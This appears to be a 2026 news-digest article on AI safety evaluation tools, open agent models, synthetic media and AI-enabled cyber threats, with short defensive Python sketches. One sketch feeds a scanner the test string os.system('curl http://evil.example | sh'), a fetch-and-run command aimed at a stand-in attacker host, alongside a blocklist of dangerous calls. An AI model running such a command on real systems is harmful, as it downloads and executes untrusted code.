Vision & Language Pulse

Safety evaluation platforms, manipulation/benchmarking, and emerging AI cybercrime

AI Security Benchmarks & Threats

Key Questions

How do recent agentic evaluation and code-review tools change safety practice?

Agentic evaluation systems (e.g., One-Eval) and agentic code-review tools (e.g., Sashiko) enable continuous, traceable testing of model behavior and autogenerated code. They help catch regressions, unsafe actions, and malicious capability growth earlier in CI/CD and at runtime, but they must themselves be hardened against manipulation and must provide transparent audit trails.
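The continuous-evaluation loop described above can be sketched as a CI-style regression gate. This is a minimal illustration only: the EvalCase structure, the substring-based scoring, and the failure budget are assumptions for the sketch, not the interface of One-Eval or any real tool.

```python
# Hypothetical CI safety gate for model outputs (illustrative only).
from dataclasses import dataclass

@dataclass
class EvalCase:
    prompt: str
    forbidden: list  # substrings the output must never contain

def run_safety_gate(model, cases, max_failures=0):
    """Run every case, log unsafe outputs for the audit trail, and
    return True only if failures stay within the allowed budget."""
    failures = []
    for case in cases:
        output = model(case.prompt)
        if any(bad in output.lower() for bad in case.forbidden):
            failures.append((case.prompt, output))
    for prompt, output in failures:
        print(f"UNSAFE: prompt={prompt!r} -> {output!r}")  # audit trail
    return len(failures) <= max_failures

# Stand-in model and a single regression case:
cases = [EvalCase("how do I clear the logs?", ["rm -rf"])]
safe_model = lambda p: "Ask your administrator to rotate the logs."
print(run_safety_gate(safe_model, cases))  # True
```

In practice the scoring step would call a proper safety classifier rather than substring matching, but the gate-and-audit-trail shape stays the same.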

What new risks arise from large vendors releasing open models to power agentic and physical systems?

Open, capable models (such as NVIDIA's announcements) lower barriers for building persistent agents and physical integrations, accelerating innovation while broadening the pool of potentially malicious actors. Risks include easier creation of autonomous cyber-attack tooling, supply-chain misuse, and proliferation of unvetted agent behaviors—necessitating provenance, usage controls, and export-aware deployment practices.

Which technical advances most affect generative-media threat models?

Video-token optimizations (e.g., NVILA/AutoGaze) and higher-fidelity generative pipelines (DLSS 5, advanced video models) make photorealistic synthetic video cheaper and faster to produce. Coupled with improved VLM robustness techniques (Directional Embedding Smoothing), this increases both the realism of synthetic media and the difficulty of detection—heightening disinformation, impersonation, and privacy-harm risks.

What immediate mitigation steps should organizations adopt given these trends?

Adopt continuous evaluation and runtime monitoring for agents; integrate automated code-verification and agentic code-review into deployment pipelines; apply provenance, watermarking, and detection tools for synthetic media; enforce least-privilege and zero-trust for agent tool access; and participate in multi-stakeholder norms and incident-sharing to address cross-border AI-enabled cybercrime.
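The least-privilege point above can be made concrete with a deny-by-default tool gate for agents. The agent names, tool names, and policy table below are hypothetical; a real deployment would back this with authenticated agent identity and audited policy storage.

```python
# Sketch of deny-by-default tool access for agents (all names made up).
ALLOWED_TOOLS = {
    "research-agent": {"web_search", "read_file"},
    "deploy-agent": {"read_file"},  # no shell, no network writes
}

def invoke_tool(agent_id, tool, call):
    """Permit a tool call only if it appears on the agent's allowlist."""
    if tool not in ALLOWED_TOOLS.get(agent_id, set()):
        raise PermissionError(f"{agent_id} may not call {tool}")
    return call()

# A research agent may search; a deploy agent may not.
print(invoke_tool("research-agent", "web_search", lambda: "results"))
try:
    invoke_tool("deploy-agent", "web_search", lambda: "results")
except PermissionError as err:
    print(err)  # deploy-agent may not call web_search
```

The design choice worth noting is the default: an unknown agent gets the empty set, so anything unlisted is denied rather than allowed.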

The 2026 AI Safety, Manipulation, and Geopolitical Landscape: New Developments and Critical Implications

As we progress through 2026, the AI ecosystem continues to accelerate in complexity and capability, bringing both unprecedented opportunities and profound security challenges. The convergence of autonomous, self-evolving agents, sophisticated multimedia generation, and open foundation models is reshaping societal, military, and economic domains. However, these advances are accompanied by escalating risks of manipulation, disinformation, and cyber warfare—necessitating a reevaluation of safety infrastructure, evaluation methodologies, and international norms.

Strengthening Safety Infrastructure Amidst Escalating Threats

The foundation of trustworthy AI remains paramount. Recent developments focus on integrating automated, agentic evaluation systems, robust code review tools, and verification frameworks that can keep pace with rapidly evolving AI capabilities:

  • Automated and Traceable Evaluation (One-Eval):
    The introduction of One-Eval marks a significant step toward continuous, autonomous evaluation of large language models (LLMs). As an agentic system, One-Eval can perform real-time, traceable assessments of AI outputs, ensuring safety, alignment, and correctness even as models self-improve. Its deployment allows for dynamic oversight, which is critical when models operate in high-stakes environments.

  • Agentic Code Review (Sashiko):
    Google's recent launch of "Sashiko" exemplifies the shift toward automated, agentic code review. Designed specifically for the Linux kernel, Sashiko employs AI agents capable of analyzing and verifying complex codebases, reducing the burden on human reviewers while closing potential oversight gaps. This tool enhances security, especially in critical infrastructure, by detecting vulnerabilities and preventing malicious code insertion.

  • Automated Verification of AI-Generated Code:
    As autonomous agents increasingly write and deploy code, verification tools are essential. Advances in automated safety verification pipelines aim to detect backdoors, malicious behaviors, and manipulation attempts in AI-generated software. These tools are integral to preventing cyber exploits and supply chain attacks, which pose significant risks in a landscape of persistent autonomous agents.
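As a toy illustration of the verification idea in the last bullet, the sketch below statically flags blocklisted calls in AI-generated Python using the standard-library ast module. The blocklist and the single-pass scan are deliberate simplifications; real verification pipelines combine static analysis, sandboxed execution, and provenance checks.

```python
# Hedged sketch: flag dangerous calls in AI-generated Python before it
# reaches a deployment pipeline. The blocklist is illustrative only.
import ast

DANGEROUS_CALLS = {"eval", "exec", "system", "popen"}

def flag_dangerous_calls(source):
    """Return the names of blocklisted calls found in the source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            func = node.func
            # Handles both bare names (eval) and attributes (os.system).
            name = getattr(func, "id", getattr(func, "attr", None))
            if name in DANGEROUS_CALLS:
                findings.append(name)
    return findings

generated = "import os\nos.system('curl http://evil.example | sh')"
print(flag_dangerous_calls(generated))  # ['system']
```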

Rise of Open, Agent-Focused Foundation Models

The landscape of foundation models has shifted toward open, scalable architectures optimized for agentic reasoning and physical-world interaction:

  • NVIDIA’s Open Models:
    At GTC 2026, NVIDIA announced a broad expansion of open model families, including the NVILA series, which are designed to power persistent, reasoning-capable AI agents. These models are compact enough for deployment on edge devices, enabling continuous interaction with physical environments—from robotics to autonomous vehicles. The open nature democratizes access but simultaneously widens attack surfaces and exposes vulnerabilities if security is not meticulously managed.

  • Compact Deployment for Persistent Agents:
    The availability of smaller, efficient models facilitates deployment of persistent agents that can operate continuously across sectors—military, industrial, and consumer. However, more capable agents mean more sophisticated attack vectors, including model manipulation and adversarial exploits, requiring robust runtime protections.

Advances in Multimodal and Video Models—Driving Generative Media and Disinformation

The multimedia generation landscape continues to evolve rapidly, amplifying both creative potential and disinformation risks:

  • Enhanced Video and Image Synthesis:
    Technologies such as NVIDIA’s NVILA-8B-HD-Video leverage AutoGaze techniques that cut video token counts by up to 100× for high-resolution, real-time video generation. These models can produce hyper-realistic content suitable for entertainment, virtual environments, and surveillance. Similarly, Seedance 2.0 from ByteDance, delayed amid Hollywood industry pressure, aims to revolutionize video AI capabilities.

  • Robustness Techniques (Directional Embedding Smoothing):
    To address vulnerabilities in vision-language models (VLMs), techniques like Directional Embedding Smoothing are being developed to enhance robustness against adversarial inputs. Such methods improve model reliability, but they can also make maliciously manipulated media harder to detect.

  • Proliferation of Deepfake and Synthetic Media:
    Democratized access to deepfake tools—including RealWonder, HiFi-Inpaint, and DreamWorld—means high-quality synthetic media can be generated by non-experts. This democratization fuels disinformation campaigns, privacy violations, and societal destabilization. Notably, recent lawsuits against Musk’s xAI over explicit images created without consent highlight the ethical and legal complexities surrounding synthetic media.
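Directional Embedding Smoothing is named only in passing above, so the sketch below shows one plausible reading of the idea: averaging an embedding over small perturbations along random unit directions, in the spirit of randomized smoothing. The function names, parameters, and the technique itself as rendered here are assumptions, not the published method.

```python
# Speculative sketch of embedding smoothing for robustness: average a
# model's embedding over inputs nudged along random unit directions.
# This is one plausible reading of the idea, not the actual algorithm.
import numpy as np

def smoothed_embedding(embed_fn, x, n_dirs=16, sigma=0.05, seed=0):
    """Average embed_fn over n_dirs perturbed copies of the input x."""
    rng = np.random.default_rng(seed)
    outs = []
    for _ in range(n_dirs):
        d = rng.normal(size=x.shape)
        d /= np.linalg.norm(d)            # random unit direction
        outs.append(embed_fn(x + sigma * d))
    return np.mean(outs, axis=0)

# With a linear embed_fn the smoothed output stays close to embed_fn(x),
# since the zero-mean perturbations roughly cancel in the average.
embed = lambda v: v * 2.0
x = np.ones(8)
print(np.allclose(smoothed_embedding(embed, x), embed(x), atol=0.1))
```

The intuition the sketch captures is that averaging over local perturbations damps the effect of a single adversarially chosen input direction.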

Geopolitical Dynamics, Regulation, and Open-Weight Model Risks

The geopolitics of AI in 2026 continues to be shaped by strategic moves, regulatory tensions, and norm-setting efforts:

  • China’s Offline and Self-Reliance Strategy:
    China emphasizes offline deployment of models like Qwen 3.5-9B and U-Claw, designed to operate securely without internet connectivity. This approach aims to reduce dependency on global infrastructure, mitigate sanctions, and foster domestic AI sovereignty, positioning China as a resilient AI power.

  • Western Regulatory Efforts and Tensions:
    The EU’s AI Act and content regulation proposals focus on transparency, safety, and provenance, but face pushback amid concerns over free speech and government overreach. Meanwhile, legal disputes—such as Anthropic’s lawsuit against the U.S. government—highlight ongoing tensions over access and control.

  • Military and Strategic Investments:
    Countries like Saudi Arabia and the U.S. continue massive investments in autonomous military AI, exemplified by Saronic’s naval AI project. These initiatives increase risks of AI-driven escalation in conflicts, especially if adversarial manipulation or malicious use occurs, underscoring the necessity for international norms and trustworthy standards.

Recent Key Developments and Emerging Challenges

Several events underscore the rapid evolution and emerging threats:

  • OpenAI’s Government Partnerships:
    Rumors suggest OpenAI has expanded collaborations with AWS to supply AI systems to the U.S. government, including classified projects. Such partnerships heighten concerns about security, oversight, and militarization, emphasizing the need for stringent safeguards.

  • Automated Verification of AI-Generated Code:
    Researchers are making strides toward tools that verify the safety of unreviewed AI-generated code in real time. This is critical for preventing exploits and software supply-chain attacks as autonomous agents increasingly write and deploy code without human review.

  • Tools for Human Verification:
    Initiatives like "World's" human-verification tools aim to authenticate the human presence behind AI-driven online activity, addressing trust issues arising from automated interactions and disinformation.

  • AI Agents Conducting Cyber Attacks:
    Investigations reveal that autonomous AI agents can identify vulnerabilities, launch exploits, and evade detection, effectively transforming AI into offensive cyber weapons. This development heightens the threat to critical infrastructure and cyberspace security, calling for international cooperation and advanced detection frameworks.

Current Status and Implications

The AI landscape in 2026 is characterized by remarkable innovation intertwined with urgent security concerns. The rise of autonomous, self-evolving agents paired with powerful multimodal models offers immense societal benefits but also amplifies risks—from disinformation to cyber warfare.

Strategic responses are emerging:

  • Integrated safety and evaluation pipelines such as One-Eval enable real-time detection of manipulation, backdoors, and malicious behaviors.
  • Robust verification frameworks for AI-generated code and agent actions help prevent exploits.
  • Provenance and traceability tools for synthetic media are vital in counteracting disinformation.
  • International norms and regulations are crucial for preventing AI-enabled cybercrime and military escalation.
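On the provenance point above, the core integrity check can be illustrated in a few lines: record a cryptographic hash of a media artifact at generation time and verify it later. Real provenance systems (for example, C2PA-style signed manifests) carry much richer, cryptographically signed metadata; this sketch covers only the hash-and-verify core, and the field names are made up.

```python
# Minimal provenance sketch for generated media: hash at creation time,
# verify before trusting. Field names and generator label are illustrative.
import hashlib
import time

def make_provenance(media_bytes, generator):
    """Record a SHA-256 digest plus minimal creation metadata."""
    return {
        "sha256": hashlib.sha256(media_bytes).hexdigest(),
        "generator": generator,
        "created": int(time.time()),
    }

def verify(media_bytes, record):
    """True iff the bytes still match the recorded digest."""
    return hashlib.sha256(media_bytes).hexdigest() == record["sha256"]

clip = b"\x00fake-video-bytes"
rec = make_provenance(clip, generator="example-video-model")
print(verify(clip, rec))                 # True: untouched artifact
print(verify(clip + b"tampered", rec))   # False: modified artifact
```

A bare hash only proves integrity, not origin; binding the record to a generator requires a signature over the record, which is what manifest standards add.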

As society navigates this transformative era, responsible development, transparent regulation, and global coordination will be essential. Decisions made now will determine whether AI becomes a tool for stability and progress or a catalyst for conflict and chaos. The path forward demands vigilance, innovation, and cooperation to harness AI’s potential while safeguarding against its emerging threats.

Updated Mar 18, 2026